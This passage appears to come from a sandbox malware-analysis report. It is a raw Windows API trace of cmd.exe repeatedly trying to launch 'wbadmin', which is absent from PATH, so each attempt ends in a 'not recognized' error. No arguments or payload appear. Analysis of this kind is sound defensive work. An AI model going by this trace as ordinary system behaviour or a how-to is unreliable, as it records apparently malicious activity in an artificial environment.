internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0163.742] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f478, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f478*=0x62) returned 1 [0163.742] ??_V@YAXPAX@Z () returned 0x1 [0163.742] GetConsoleTitleW (in: lpConsoleTitle=0xb9f928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0163.743] malloc (_Size=0xffce) returned 0x2127e0 [0163.743] ??_V@YAXPAX@Z () returned 0xb9f6b4 [0163.743] malloc (_Size=0xffce) returned 0x2227b8 [0163.743] ??_V@YAXPAX@Z () returned 0xb9f46c [0163.743] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.743] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.743] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.743] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.743] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.743] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.743] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.743] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.743] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.743] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.743] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.743] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.743] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.743] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.743] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.743] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.743] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.743] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.743] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.743] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.743] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.743] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.743] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.743] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.744] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.744] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.744] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.744] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.744] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.744] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.744] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.744] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.744] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.744] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.744] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.744] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.744] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.744] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.744] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.744] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.744] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.744] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.744] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.744] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.744] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.744] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.744] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.744] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.744] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.744] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.744] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.744] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.744] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.744] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.744] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.744] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.744] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.744] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.744] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.745] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.745] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.745] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.745] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.745] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.745] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.745] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.745] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.745] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.745] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.745] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.745] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.745] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.745] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.745] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.745] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.745] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.745] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.745] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.745] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.745] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.745] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.745] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.745] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.745] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.745] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0163.745] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0163.745] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0163.745] ??_V@YAXPAX@Z () returned 0x1 [0163.745] GetProcessHeap () returned 0x100000 [0163.745] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x14cd48 [0163.745] GetProcessHeap () returned 0x100000 [0163.745] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x48) returned 0x101548 [0163.745] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0163.746] malloc (_Size=0xffce) returned 0x2227b8 [0163.746] ??_V@YAXPAX@Z () returned 0xb9f1ec [0163.746] GetProcessHeap () returned 0x100000 [0163.746] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x15cd28 [0163.746] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x15cd30, lpFilePart=0xb9f20c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f20c*="Desktop") returned 0x17 [0163.746] SetErrorMode (uMode=0x0) returned 0x1 [0163.746] GetProcessHeap () returned 0x100000 [0163.746] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x15cd28, Size=0x48) returned 0x15cd28 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x15cd28) returned 0x48 [0163.747] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0163.747] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x1084a0 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x1056b0 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1056b0, Size=0x1b6) returned 0x1056b0 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1056b0) returned 0x1b6 [0163.747] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x105870 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x105870, Size=0x76) returned 0x105870 [0163.747] GetProcessHeap () returned 0x100000 [0163.747] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x105870) returned 0x76 [0163.747] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.747] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.747] GetLastError () returned 0x2 [0163.747] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.748] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.748] GetLastError () returned 0x2 [0163.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.748] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.748] GetLastError () returned 0x2 [0163.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.748] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.748] GetLastError () returned 0x2 [0163.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.748] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.749] GetLastError () returned 0x2 [0163.749] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.749] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.749] GetLastError () returned 0x2 [0163.749] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.749] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef98) returned 0xffffffff [0163.749] GetLastError () returned 0x2 [0163.749] ??_V@YAXPAX@Z () returned 0x1 [0163.749] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.749] GetFileType (hFile=0x94) returned 0x2 [0163.749] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.749] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f3e4 | out: lpMode=0xb9f3e4) returned 1 [0163.750] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.750] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f434 | out: lpConsoleScreenBufferInfo=0xb9f434) returned 1 [0163.750] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0163.750] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f464 | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0163.750] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f418, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f418*=0x62) returned 1 [0163.750] ??_V@YAXPAX@Z () returned 0x1 [0163.750] GetConsoleTitleW (in: lpConsoleTitle=0xb9f8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0163.751] malloc (_Size=0xffce) returned 0x2127e0 [0163.751] ??_V@YAXPAX@Z () returned 0xb9f654 [0163.751] malloc (_Size=0xffce) returned 0x2227b8 [0163.751] ??_V@YAXPAX@Z () returned 0xb9f40c [0163.751] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.751] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.751] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.751] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.751] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.751] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.751] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.751] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.751] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.751] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.751] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.751] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.751] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.751] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.751] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.751] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.751] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.751] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.751] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.751] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.751] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.751] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.751] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.751] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.752] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.752] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.752] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.752] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.752] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.752] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.752] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.752] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.752] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.752] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.752] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.752] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.752] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.752] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.752] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.752] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.752] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.752] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.752] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0163.752] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0163.752] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0163.752] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0163.752] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0163.752] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0163.752] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0163.752] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0163.752] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0163.752] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0163.752] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0163.752] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0163.752] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0163.752] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0163.752] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0163.752] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0163.752] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0163.752] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0163.753] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0163.753] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0163.753] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0163.753] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0163.753] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0163.753] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0163.753] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0163.753] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0163.753] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0163.753] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0163.753] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0163.753] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0163.753] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0163.753] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0163.753] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0163.753] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0163.753] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0163.753] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0163.753] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0163.753] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0163.753] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0163.753] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0163.753] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0163.753] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0163.753] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0163.753] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0163.753] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0163.753] ??_V@YAXPAX@Z () returned 0x1 [0163.753] GetProcessHeap () returned 0x100000 [0163.753] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x15cd78 [0163.753] GetProcessHeap () returned 0x100000 [0163.753] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x4e) returned 0x108660 [0163.753] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0163.753] malloc (_Size=0xffce) returned 0x2227b8 [0163.754] ??_V@YAXPAX@Z () returned 0xb9f18c [0163.754] GetProcessHeap () returned 0x100000 [0163.754] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x16cd58 [0163.755] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x16cd60, lpFilePart=0xb9f1ac | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f1ac*="Desktop") returned 0x17 [0163.755] SetErrorMode (uMode=0x0) returned 0x1 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x16cd58, Size=0x48) returned 0x16cd58 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x16cd58) returned 0x48 [0163.755] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0163.755] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x1058f0 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x1186f8 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1186f8, Size=0x1b6) returned 0x1186f8 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1186f8) returned 0x1b6 [0163.755] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.755] GetProcessHeap () returned 0x100000 [0163.755] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x1188b8 [0163.755] GetProcessHeap () returned 0x100000 [0163.756] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1188b8, Size=0x76) returned 0x1188b8 [0163.756] GetProcessHeap () returned 0x100000 [0163.756] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1188b8) returned 0x76 [0163.756] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.757] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.757] GetLastError () returned 0x2 [0163.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.757] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.757] GetLastError () returned 0x2 [0163.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.757] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.757] GetLastError () returned 0x2 [0163.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.757] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.758] GetLastError () returned 0x2 [0163.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.758] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.758] GetLastError () returned 0x2 [0163.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.758] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.758] GetLastError () returned 0x2 [0163.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.758] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0xb9ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9ef38) returned 0xffffffff [0163.758] GetLastError () returned 0x2 [0163.758] ??_V@YAXPAX@Z () returned 0x1 [0163.758] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.758] GetFileType (hFile=0x94) returned 0x2 [0163.758] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.758] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f384 | out: lpMode=0xb9f384) returned 1 [0163.761] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.761] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f3d4 | out: lpConsoleScreenBufferInfo=0xb9f3d4) returned 1 [0163.761] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0163.761] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f404 | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0163.761] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f3b8, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f3b8*=0x62) returned 1 [0163.762] ??_V@YAXPAX@Z () returned 0x1 [0163.762] GetConsoleTitleW (in: lpConsoleTitle=0xb9f868, nSize=0x104 | out: 